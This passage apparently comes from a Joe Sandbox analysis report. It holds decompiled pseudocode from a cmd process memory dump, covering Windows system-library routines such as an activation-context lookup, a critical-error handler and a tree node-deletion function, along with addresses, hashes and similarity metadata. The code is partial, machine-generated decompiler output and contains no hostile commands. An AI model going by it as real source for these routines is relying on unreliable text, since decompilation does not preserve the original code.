						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

































                                                                                                                                          0x03c0d29c
                                                                                                                                          0x03c0d2a6
                                                                                                                                          0x03c0d2b1
                                                                                                                                          0x03c0d2b5
                                                                                                                                          0x03c0d2b6
                                                                                                                                          0x03c0d2bc
                                                                                                                                          0x03c0d2bd
                                                                                                                                          0x03c0d2be
                                                                                                                                          0x03c0d2bf
                                                                                                                                          0x03c0d2c2
                                                                                                                                          0x03c0d2c4
                                                                                                                                          0x03c0d2cc
                                                                                                                                          0x03c0d384
                                                                                                                                          0x03c0d34b
                                                                                                                                          0x03c0d34f
                                                                                                                                          0x03c0d350
                                                                                                                                          0x03c0d351
                                                                                                                                          0x03c0d35c
                                                                                                                                          0x03c0d35c
                                                                                                                                          0x03c0d2d6
                                                                                                                                          0x03c0d2da
                                                                                                                                          0x03c0d2e1
                                                                                                                                          0x03c0d361
                                                                                                                                          0x03c0d369
                                                                                                                                          0x03c0d36d
                                                                                                                                          0x03c0d2e3
                                                                                                                                          0x03c0d2e3
                                                                                                                                          0x03c0d2e3
                                                                                                                                          0x03c0d2e5
                                                                                                                                          0x03c0d2ed
                                                                                                                                          0x03c0d2f5
                                                                                                                                          0x03c0d2fa
                                                                                                                                          0x03c0d302
                                                                                                                                          0x03c0d303
                                                                                                                                          0x03c0d30b
                                                                                                                                          0x03c0d30f
                                                                                                                                          0x03c0d313
                                                                                                                                          0x03c0d318
                                                                                                                                          0x03c0d31c
                                                                                                                                          0x03c0d320
                                                                                                                                          0x03c0d379
                                                                                                                                          0x03c0d37d
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4affe
                                                                                                                                          0x03c4b001
                                                                                                                                          0x03c4b011
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0d322
                                                                                                                                          0x03c0d322
                                                                                                                                          0x03c0d330
                                                                                                                                          0x03c0d337
                                                                                                                                          0x03c0d35d
                                                                                                                                          0x03c0d339
                                                                                                                                          0x03c0d33f
                                                                                                                                          0x03c0d38c
                                                                                                                                          0x03c0d38c
                                                                                                                                          0x03c0d33f
                                                                                                                                          0x03c0d349
                                                                                                                                          0x00000000
                                                                                                                                          0x03c0d349

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                          • Opcode ID: fb8dfa222d788622edee7c2ef8aeb5f0a34cbc1ebb198fd7e8c3186c7b61b343
                                                                                                                                          • Instruction ID: 24f16cf57c094fb038d05dbd2cd7990eb364d6191ac9a02ef344dfdead5372a6
                                                                                                                                          • Opcode Fuzzy Hash: fb8dfa222d788622edee7c2ef8aeb5f0a34cbc1ebb198fd7e8c3186c7b61b343
                                                                                                                                          • Instruction Fuzzy Hash: 1C31B1B55083459FC310DF69C884A6BFBF8EB89654F04096EF996C7290D634DE08DBD2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BE1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                          			E03BE1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E03C1BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E03C1A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E03C1A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L03BF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L03BF4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                                                          0x03be1b8f
                                                                                                                                          0x03be1b9a
                                                                                                                                          0x03be1b9c
                                                                                                                                          0x03be1b9e
                                                                                                                                          0x03be1ba3
                                                                                                                                          0x03c37010
                                                                                                                                          0x03c37010
                                                                                                                                          0x00000000
                                                                                                                                          0x03be1ba9
                                                                                                                                          0x03be1ba9
                                                                                                                                          0x03be1bae
                                                                                                                                          0x00000000
                                                                                                                                          0x03be1bc5
                                                                                                                                          0x03be1bca
                                                                                                                                          0x03be1bcf
                                                                                                                                          0x03be1bd0
                                                                                                                                          0x03be1bd1
                                                                                                                                          0x03be1bd2
                                                                                                                                          0x03be1bd6
                                                                                                                                          0x03be1bdc
                                                                                                                                          0x03be1be0
                                                                                                                                          0x03c36ffc
                                                                                                                                          0x03c37000
                                                                                                                                          0x00000000
                                                                                                                                          0x03c37006
                                                                                                                                          0x03c37009
                                                                                                                                          0x03c37009
                                                                                                                                          0x03be1be6
                                                                                                                                          0x03be1bec
                                                                                                                                          0x03be1c0b
                                                                                                                                          0x03be1c0b
                                                                                                                                          0x03be1c0c
                                                                                                                                          0x03be1c11
                                                                                                                                          0x03be1c12
                                                                                                                                          0x03be1c15
                                                                                                                                          0x03be1c1b
                                                                                                                                          0x03be1c1f
                                                                                                                                          0x03be1c31
                                                                                                                                          0x03be1c33
                                                                                                                                          0x03c37026
                                                                                                                                          0x03c37026
                                                                                                                                          0x03be1c21
                                                                                                                                          0x03be1c24
                                                                                                                                          0x03be1c24
                                                                                                                                          0x03be1bee
                                                                                                                                          0x03be1bee
                                                                                                                                          0x03be1bf2
                                                                                                                                          0x03be1c3a
                                                                                                                                          0x03be1bf4
                                                                                                                                          0x03be1bf4
                                                                                                                                          0x03be1c05
                                                                                                                                          0x03be1c05
                                                                                                                                          0x03be1c09
                                                                                                                                          0x03be1c3e
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03be1c09
                                                                                                                                          0x03be1bec
                                                                                                                                          0x03be1be0
                                                                                                                                          0x03be1bae
                                                                                                                                          0x03be1c2e

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: WindowsExcludedProcs
                                                                                                                                          • API String ID: 0-3583428290
                                                                                                                                          • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                          • Instruction ID: b802fce903f6c0d93c9944b141a0592d6506caaee4b3981ecdfdac328462651d
                                                                                                                                          • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                                                          • Instruction Fuzzy Hash: 1E21D37A501628ABCB21DA5DC940F9BB7ADEB46655F2A44B5E905DF300D730DD00E7E0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BFF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                          			E03BFF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                                                          0x03bff71d
                                                                                                                                          0x03bff722
                                                                                                                                          0x03bff726
                                                                                                                                          0x03c44770
                                                                                                                                          0x03bff765
                                                                                                                                          0x03bff769
                                                                                                                                          0x03bff769
                                                                                                                                          0x03bff732
                                                                                                                                          0x03c4477a
                                                                                                                                          0x00000000
                                                                                                                                          0x03c4477a
                                                                                                                                          0x03bff738
                                                                                                                                          0x03bff73a
                                                                                                                                          0x03bff73c
                                                                                                                                          0x03bff73f
                                                                                                                                          0x03bff746
                                                                                                                                          0x03bff778
                                                                                                                                          0x03bff7a9
                                                                                                                                          0x03bff7a9
                                                                                                                                          0x03bff754
                                                                                                                                          0x03bff75a
                                                                                                                                          0x03bff75d
                                                                                                                                          0x03bff75f
                                                                                                                                          0x03bff761
                                                                                                                                          0x03bff76f
                                                                                                                                          0x03bff771
                                                                                                                                          0x03bff771
                                                                                                                                          0x03bff76f
                                                                                                                                          0x03bff763
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff763
                                                                                                                                          0x03bff77d
                                                                                                                                          0x03bff7a3
                                                                                                                                          0x03bff7a5
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff7a5
                                                                                                                                          0x03bff77f
                                                                                                                                          0x03bff782
                                                                                                                                          0x03bff784
                                                                                                                                          0x03bff786
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff788
                                                                                                                                          0x03bff748
                                                                                                                                          0x03bff74d
                                                                                                                                          0x03bff78d
                                                                                                                                          0x03bff793
                                                                                                                                          0x03bff7b7
                                                                                                                                          0x03bff7bc
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff7bc
                                                                                                                                          0x03bff798
                                                                                                                                          0x00000000
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff79d
                                                                                                                                          0x03bff7b0
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff7b0
                                                                                                                                          0x03bff79f
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff74f
                                                                                                                                          0x03bff74f
                                                                                                                                          0x00000000
                                                                                                                                          0x03bff74f

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Actx
                                                                                                                                          • API String ID: 0-89312691
                                                                                                                                          • Opcode ID: c76a999bb1e02e7e6196651f0deae6532fd6bebc448e47948e689f466b2a14d3
                                                                                                                                          • Instruction ID: c94c37667ff4febebdb1027c994b32842aba801f1096653dba86c63975d87a69
                                                                                                                                          • Opcode Fuzzy Hash: c76a999bb1e02e7e6196651f0deae6532fd6bebc448e47948e689f466b2a14d3
                                                                                                                                          • Instruction Fuzzy Hash: 7811B6357046428FEB24CE1D8590736F299EB8566CF2C65FAE661DB3A1DB70D849C340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C88DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 71%
                                                                                                                                          			E03C88DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x3cb0d50);
				E03C2D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03C65720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = L03C2DEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				L03C2DEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E03C2D130(_t34, _t39, _t40);
			}





                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df1
                                                                                                                                          0x03c88df3
                                                                                                                                          0x03c88df8
                                                                                                                                          0x03c88dfd
                                                                                                                                          0x03c88e00
                                                                                                                                          0x03c88e0e
                                                                                                                                          0x03c88e2a
                                                                                                                                          0x03c88e36
                                                                                                                                          0x03c88e38
                                                                                                                                          0x03c88e3c
                                                                                                                                          0x03c88e46
                                                                                                                                          0x03c88e46
                                                                                                                                          0x03c88e36
                                                                                                                                          0x03c88e50
                                                                                                                                          0x03c88e56
                                                                                                                                          0x03c88e59
                                                                                                                                          0x03c88e5c
                                                                                                                                          0x03c88e60
                                                                                                                                          0x03c88e67
                                                                                                                                          0x03c88e6d
                                                                                                                                          0x03c88e73
                                                                                                                                          0x03c88e74
                                                                                                                                          0x03c88eb1
                                                                                                                                          0x03c88ebd

                                                                                                                                          Strings
                                                                                                                                          • Critical error detected %lx, xrefs: 03C88E21
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: Critical error detected %lx
                                                                                                                                          • API String ID: 0-802127002
                                                                                                                                          • Opcode ID: 5ef3ae48483788d9823f509bab6f246f0528561ff7fdec7f7a22f96cee765450
                                                                                                                                          • Instruction ID: a3dddb7840ecaf23c9e28ae03fe1ebc5f692a17bede61c95839e17fdc659c98b
                                                                                                                                          • Opcode Fuzzy Hash: 5ef3ae48483788d9823f509bab6f246f0528561ff7fdec7f7a22f96cee765450
                                                                                                                                          • Instruction Fuzzy Hash: 531175B9D14348EADB24DFA8890979DBBB0AF14318F24426EE069EB292C3300602CF15
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C6FF10 Relevance: 1.3, Strings: 1, Instructions: 44COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Strings
                                                                                                                                          • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 03C6FF60
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                                                          • API String ID: 0-1911121157
                                                                                                                                          • Opcode ID: 009fd440a0a685f2cd8a474d795f05694edde45f1470e4bed59ba8657fc46021
                                                                                                                                          • Instruction ID: 827ec63a5b73af0663440644a4d21f8cd8d84b193763be858949106bd8b2d93d
                                                                                                                                          • Opcode Fuzzy Hash: 009fd440a0a685f2cd8a474d795f05694edde45f1470e4bed59ba8657fc46021
                                                                                                                                          • Instruction Fuzzy Hash: C6110475920284EFDB12EB50CC89F98BBF1FF04704F198058E005DF1A1C7399A40DB51
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03BDF900 Relevance: .9, Instructions: 863COMMONCrypto
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 99%
                                                                                                                                          			E03BDF900(signed int _a4, signed int _a8) {
				signed char _v5;
				signed char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _t285;
				signed int _t289;
				signed char _t292;
				signed int _t293;
				signed char _t295;
				signed int _t300;
				signed int _t301;
				signed char _t306;
				signed char _t307;
				signed char _t308;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed char _t314;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t328;
				signed char _t329;
				signed int _t337;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed char _t350;
				signed int _t351;
				signed char _t353;
				signed char _t356;
				signed int _t357;
				signed char _t359;
				signed int _t360;
				signed char _t363;
				signed int _t364;
				signed int _t366;
				signed int* _t372;
				signed char _t373;
				signed char _t378;
				signed int _t379;
				signed int* _t382;
				signed int _t383;
				signed char _t385;
				signed int _t387;
				signed int _t388;
				signed char _t390;
				signed int _t393;
				signed int _t395;
				signed char _t397;
				signed int _t401;
				signed int _t405;
				signed int _t407;
				signed int _t409;
				signed int _t410;
				signed int _t413;
				signed char _t415;
				signed int _t416;
				signed char _t418;
				signed int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed char* _t425;
				signed char _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t431;
				signed int _t432;
				signed int _t434;
				signed int _t436;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t452;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t461;
				signed int _t462;
				signed int _t464;
				signed int _t467;
				signed int _t470;
				signed int _t474;
				signed int _t475;
				signed int _t477;
				signed int _t481;
				signed int _t483;
				signed int _t486;
				signed int _t487;
				signed int _t488;

				_t285 =  *(_a4 + 4);
				_t444 = _a8;
				_t452 =  *_t444;
				_t421 = _t285 & 1;
				if(_t421 != 0) {
					if(_t452 != 0) {
						_t452 = _t452 ^ _t444;
					}
				}
				_t393 =  *(_t444 + 4);
				if(_t421 != 0) {
					if(_t393 != 0) {
						_t393 = _t393 ^ _t444;
					}
				}
				_t426 = _t393;
				if(_t452 != 0) {
					_t426 = _t452;
				}
				_v5 = _t285 & 0x00000001;
				asm("sbb eax, eax");
				if((_t393 &  ~_t452) != 0) {
					_t289 = _t393;
					_t427 = _v5;
					_t422 = _t393;
					_v12 = _t393;
					_v16 = 1;
					if( *_t393 != 0) {
						_v16 = _v16 & 0x00000000;
						_t445 =  *_t393;
						goto L115;
						L116:
						_t289 = _t445;
						L117:
						_t445 =  *_t289;
						if(_t445 != 0) {
							L115:
							_t422 = _t289;
							if(_t427 != 0) {
								goto L183;
							}
							goto L116;
						} else {
							_t444 = _a8;
							_v12 = _t289;
							goto L27;
						}
						L183:
						if(_t445 == 0) {
							goto L116;
						}
						_t289 = _t289 ^ _t445;
						goto L117;
					}
					L27:
					if(_t427 != 0) {
						if(_t452 == 0) {
							goto L28;
						}
						_t428 = _t289 ^ _t452;
						L29:
						 *_t289 = _t428;
						_t429 =  *(_t452 + 8);
						_v20 = _t429;
						_t426 = _t429 & 0xfffffffc;
						_t292 =  *(_a4 + 4) & 0x00000001;
						_v6 = _t292;
						_t293 = _v12;
						if(_t292 != 0) {
							if(_t426 != 0) {
								_t426 = _t426 ^ _t452;
							}
						}
						if(_t426 != _t444) {
							L174:
							_t423 = 0x1d;
							asm("int 0x29");
							goto L175;
						} else {
							_t436 = _t293;
							if(_v6 != 0) {
								_t436 = _t436 ^ _t452;
							}
							_v20 = _v20 & 0x00000003;
							_v20 = _v20 | _t436;
							 *(_t452 + 8) = _v20;
							_t426 =  *(_t393 + 8) & 0xfffffffc;
							_t356 =  *(_a4 + 4) & 0x00000001;
							_v6 = _t356;
							_t357 = _v12;
							if(_t356 != 0) {
								if(_t426 != 0) {
									_t426 = _t426 ^ _t393;
								}
							}
							if(_t426 != _t444) {
								goto L174;
							} else {
								_t483 = _t393 ^ _t357;
								_v24 = _t483;
								if(_v6 == 0) {
									_v24 = _t357;
								}
								 *(_t393 + 8) =  *(_t393 + 8) & 0x00000003 | _v24;
								_t426 =  *(_t357 + 4);
								_t444 = _a8;
								_t359 =  *(_a4 + 4) & 0x00000001;
								_v6 = _t359;
								_t360 = _v12;
								_v24 = _t483;
								if(_t359 != 0) {
									_v24 = _t483;
									if(_t426 == 0) {
										goto L37;
									}
									_t426 = _t426 ^ _t360;
									L38:
									if(_v6 == 0) {
										_t483 = _t393;
									}
									_t413 =  *(_t360 + 8);
									 *(_t360 + 4) = _t483;
									_t452 = _t413 & 0xfffffffc;
									_v5 = _t413;
									_t363 =  *(_a4 + 4) & 0x00000001;
									_v6 = _t363;
									if(_t363 != 0) {
										_t364 = _v12;
										_v5 = _t413;
										if(_t452 == 0) {
											goto L41;
										}
										_v20 = _t452;
										_v20 = _v20 ^ _t364;
										L42:
										if(_v20 != _t422) {
											_v5 = _t413;
											if(_v6 == 0) {
												L199:
												_t366 = _v12;
												L200:
												if(_t452 != 0 || _t366 != _t422) {
													goto L174;
												} else {
													goto L43;
												}
											}
											_t366 = _v12;
											_v5 = _t413;
											if(_t452 == 0) {
												goto L199;
											}
											_t452 = _t452 ^ _t366;
											goto L200;
										}
										L43:
										_t486 =  *(_t444 + 8) & 0xfffffffc;
										if(_v6 != 0) {
											if(_t486 != 0) {
												_t486 = _t486 ^ _t444;
											}
											if(_v6 != 0 && _t486 != 0) {
												_t486 = _t486 ^ _t366;
											}
										}
										_t415 = _t413 & 0x00000003 | _t486;
										 *(_t366 + 8) = _t415;
										_t416 = _v12;
										 *(_t416 + 8) = ( *(_t444 + 8) ^ _t415) & 0x00000001 ^ _t415;
										_t452 =  *(_t444 + 8);
										_t372 = _a4;
										if((_t452 & 0xfffffffc) == 0) {
											if( *_t372 != _t444) {
												goto L174;
											} else {
												 *_t372 = _t416;
												goto L52;
											}
										} else {
											_t452 = _t452 & 0xfffffffc;
											_t378 = _t372[1] & 0x00000001;
											_v6 = _t378;
											if(_t378 != 0) {
												if(_t452 != 0) {
													_t452 = _t452 ^ _t444;
												}
											}
											_t379 =  *(_t452 + 4);
											if(_v6 != 0) {
												if(_t379 != 0) {
													_t379 = _t379 ^ _t452;
												}
											}
											_v24 = _t379;
											_t382 = _t452 + (0 | _v24 == _t444) * 4;
											_v28 = _t382;
											_t383 =  *_t382;
											if(_v6 != 0) {
												if(_t383 != 0) {
													_t383 = _t383 ^ _t452;
												}
											}
											if(_t383 != _t444) {
												goto L174;
											} else {
												if(_v6 != 0) {
													_t487 = _t452 ^ _t416;
												} else {
													_t487 = _t416;
												}
												 *_v28 = _t487;
												L52:
												_t373 = _v5;
												L12:
												_t452 = _a4;
												_v5 = _t373 & 0x00000001;
												if(( *(_t452 + 4) & 0x00000001) != 0) {
													if(_t426 == 0) {
														goto L13;
													}
													_t306 = _t422 ^ _t426;
													L14:
													_t444 = _v16;
													 *(_t422 + _t444 * 4) = _t306;
													if(_t426 != 0) {
														_t306 =  *(_t426 + 8) & 0xfffffffc;
														_t418 =  *(_t452 + 4) & 0x00000001;
														_v6 = _t418;
														_t419 = _v12;
														if(_t418 != 0) {
															if(_t306 != 0) {
																_t306 = _t306 ^ _t426;
															}
														}
														if(_t306 != _t419) {
															goto L174;
														} else {
															if(_v6 != 0) {
																if(_t422 != 0) {
																	_t422 = _t422 ^ _t426;
																}
															}
															 *(_t426 + 8) = _t422;
															L24:
															return _t306;
														}
													}
													if(_v5 != _t426) {
														goto L24;
													} else {
														_t395 = _t452;
														_t306 =  *(_t395 + 4);
														L17:
														_t446 = _t423;
														_t434 = _v16 ^ 0x00000001;
														_v24 = _t446;
														_v12 = _t434;
														_t452 =  *(_t423 + _t434 * 4);
														if((_t306 & 0x00000001) != 0) {
															if(_t452 == 0) {
																goto L18;
															}
															_t426 = _t452 ^ _t446;
															L19:
															if(( *(_t426 + 8) & 0x00000001) != 0) {
																_t310 =  *(_t426 + 8) & 0xfffffffc;
																_t444 = _t306 & 1;
																if(_t444 != 0) {
																	if(_t310 != 0) {
																		_t310 = _t310 ^ _t426;
																	}
																}
																if(_t310 != _t423) {
																	goto L174;
																} else {
																	if(_t444 != 0) {
																		if(_t452 != 0) {
																			_t452 = _t452 ^ _t423;
																		}
																	}
																	if(_t452 != _t426) {
																		goto L174;
																	} else {
																		_t452 =  *(_t423 + 8) & 0xfffffffc;
																		if(_t444 != 0) {
																			if(_t452 == 0) {
																				L170:
																				if( *_t395 != _t423) {
																					goto L174;
																				} else {
																					 *_t395 = _t426;
																					L140:
																					if(_t444 != 0) {
																						if(_t452 != 0) {
																							_t452 = _t452 ^ _t426;
																						}
																					}
																					 *(_t426 + 8) =  *(_t426 + 8) & 0x00000003 | _t452;
																					_t300 =  *(_t426 + _v16 * 4);
																					if(_t444 != 0) {
																						if(_t300 == 0) {
																							goto L143;
																						}
																						_t300 = _t300 ^ _t426;
																						goto L142;
																					} else {
																						L142:
																						if(_t300 != 0) {
																							_t401 =  *(_t300 + 8);
																							_t452 = _t401 & 0xfffffffc;
																							if(_t444 != 0) {
																								if(_t452 != 0) {
																									_t452 = _t452 ^ _t300;
																								}
																							}
																							if(_t452 != _t426) {
																								goto L174;
																							} else {
																								if(_t444 != 0) {
																									_t481 = _t300 ^ _t423;
																								} else {
																									_t481 = _t423;
																								}
																								 *(_t300 + 8) = _t401 & 0x00000003 | _t481;
																								goto L143;
																							}
																						}
																						L143:
																						if(_t444 != 0) {
																							if(_t300 != 0) {
																								_t300 = _t300 ^ _t423;
																							}
																						}
																						 *(_t423 + _v12 * 4) = _t300;
																						_t454 = _t426;
																						if(_t444 != 0) {
																							_t455 = _t454 ^ _t423;
																							_t301 = _t455;
																						} else {
																							_t301 = _t423;
																							_t455 = _t454 ^ _t301;
																						}
																						 *(_t426 + _v16 * 4) = _t301;
																						_t395 = _a4;
																						if(_t444 == 0) {
																							_t455 = _t426;
																						}
																						 *(_t423 + 8) =  *(_t423 + 8) & 0x00000003 | _t455;
																						 *(_t426 + 8) =  *(_t426 + 8) & 0x000000fe;
																						 *(_t423 + 8) =  *(_t423 + 8) | 0x00000001;
																						_t426 =  *(_t423 + _v12 * 4);
																						_t306 =  *(_t395 + 4);
																						if((_t306 & 0x00000001) != 0) {
																							if(_t426 != 0) {
																								_t426 = _t426 ^ _t423;
																							}
																						}
																						_t446 = _v24;
																						goto L20;
																					}
																				}
																			}
																			_t452 = _t452 ^ _t423;
																		}
																		if(_t452 == 0) {
																			goto L170;
																		}
																		_t311 =  *(_t452 + 4);
																		if(_t444 != 0) {
																			if(_t311 != 0) {
																				_t311 = _t311 ^ _t452;
																			}
																		}
																		if(_t311 == _t423) {
																			if(_t444 != 0) {
																				L175:
																				_t295 = _t452 ^ _t426;
																				goto L169;
																			} else {
																				_t295 = _t426;
																				L169:
